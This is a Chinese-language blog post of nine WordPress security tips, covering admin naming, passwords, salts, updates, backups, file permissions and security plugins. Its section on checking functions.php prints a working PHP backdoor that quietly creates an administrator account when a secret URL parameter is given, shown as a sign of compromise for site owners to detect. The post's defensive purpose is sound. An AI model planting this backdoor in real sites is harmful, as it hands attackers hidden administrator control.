每一个网站都面临着很多威胁,哪怕是BAT,只不过他们防护做得好,几乎无懈可击。所以如何保障网站安全就变得极其重要了。以下9个方法可以使WordPress网站变得更加安全,当然你也可以根据下面的审查下自己网站是否还有优化的地方。
不要使用admin
作为管理员登录名
admin
是WordPress的默认管理员,你可以在网站后台的’用户’中看到是否存在这个用户名,如果存在,新建一个超级管理员,再删除它,或者我们也可以直接登录数据库修改用户名,找到用户表(如wp_users
),然后双击修改user_login
字段,改成你认为安全的管理员登录名。
使用更加复杂安全的登录密码
既然用户名很重要,那么登录密码同样不可忽视,越是复杂的密码,就越难被黑客破解,所以我们需要对超级管理员设置更安全的密码。
如果你实在想不出哪个密码更安全,我建议使用WordPress后台生成的,在WordPress4以上版本中可以通过后台-用户-编辑个人资料,拉到最下面的“账户管理”,有个生成密码案按钮,点击生成即可。它还可以用来作为密码强弱的验证工具。
除此以外,还可以考虑WordPress的两步验证插件,因为我还没使用过,所以这里不推荐使用使用哪款插件更加合适。
修改身份认证密钥与盐
有必要修改wp-config.php
配置文件中从第45行的身份认证密钥与盐
,这个可以直接在 https://api.wordpress.org/secret-key/1.1/salt/中生成,然后粘贴在这里。如下图:
及时升级WordPress、插件、主题
WordPress升级的意义一来是修复漏洞,二来是增加新功能,所以需要及时同步更新,升级也很简单,直接后台点击更新即可。不过在升级前最好备份下程序数据。同时检查下安装的插件是否有需要更新的。卸载那些不常用或者作者已经停止维护的插件。
对于主题,亦是如此,将不用的主题也删除,仅保留启用的或者默认的主题。
清理僵尸用户
有用户躺着它不一定是不活跃的用户,有可能是潜伏在后台的用于黑客登录的入口用户。所以一定要加以小心,如果不是特别需要,请不要启用允许所有用户注册
功能。
制定一个网站备份计划
WordPress网站备份分数据库和WordPress的wp-content
文件夹,数据库可安装一个备份插件,我用过的有WordPress Database Backup
,地址在这: https://wordpress.org/plugins/wp-db-backup/,它可以按计划自动备份,且可以指定备份位置,比如是主机中还是通过Email发送到你指定的邮件。
至于wp-content
文件夹,可以通过FTP
软件备份到本地文件夹。里面包含的是主题、图片、插件。
检查主题的function.php
文件
与你本地正常的function.php
文件进行比较,如果发现多了代码,立马删除,并检查主题文件是否还有其他代码判断,检测的办法就是通过ftp
查看文件夹或文件修改时间是否有异常。
如果有以下代码,则要特别小心,你的网站已经被入侵了!
- <?php
- add_action( ‘wp_head’, ‘my_back’ );
- function my_back() {
- if ( $_GET[‘back’] == ’42rfb0n2′ ) {
- require( ‘wp-includes/registration.php’ );
- if ( !username_exists( ‘mr_admin’ ) ) {
- $user_id = wp_create_user( ‘guest’, ’42rfb0n2′ );
- $user = new WP_User( $user_id );
- $user->set_role( ‘administrator’ );
- }
- }
- }
- ?>
设置网站的文件夹及文件访问权限
建议使用Linux系统的主机,文件安全策略应该遵循:文件夹权限为755,文件权限为644。
及时查看网站目录有没有莫名其妙的文件夹或者文件出现。
使用WordPress安全插件
在完成以上所有工作后,它还只是基础的,就好比一台电脑,还差个杀毒软件或者防火墙。我使用过2款安全插件,效果可以,至少能保抵御大部分的攻击。这2款插件是:
- Wordfence Security
这款插件主要的特色是拥有防火墙功能,加强的登录保护,只要有用户登录就会发送Email到管理员指定的邮箱。它还拥有统计功能,统计每天被攻击的次数与来源。如果网站文件被修改过,也会邮件通知。
这款插件有免费版和收费版,免费的已经很厚道了。建议一般用户使用免费版即可。
想要了解插件更多的功能,请点击:
https://wordpress.org/plugins/wordfence/
推荐指数:5颗星。 - WP Cerber Security
该插件同样很强大,它可通过限制通过登录表单,XML-RPC / REST API请求或使用验证cookie的登录尝试次数来保护WordPress免受暴力攻击。
限制使用黑色IP访问列表和白色IP访问列表进行访问。
通过强大的电子邮件,移动和桌面通知来跟踪用户和入侵者的活动。
想要了解插件更多的功能,请点击:
https://wordpress.org/plugins/wp-cerber/
推荐指数:5颗星。
以上两款插件可以并存,也就意味着你可以选择任意一款,也可以同时安装两款插件。不过要注意的是,他们会新建很多数据库表以便记录所需信息。
小结
作为网站的管理者或者运营者,根据以上的方法都实施一遍,会使网站变得更加安全。
如果看完这篇文章还不知道如何实施的,请下方留言或者与我联系:mr.kouok@qq.com。
如需转载,请注明出处!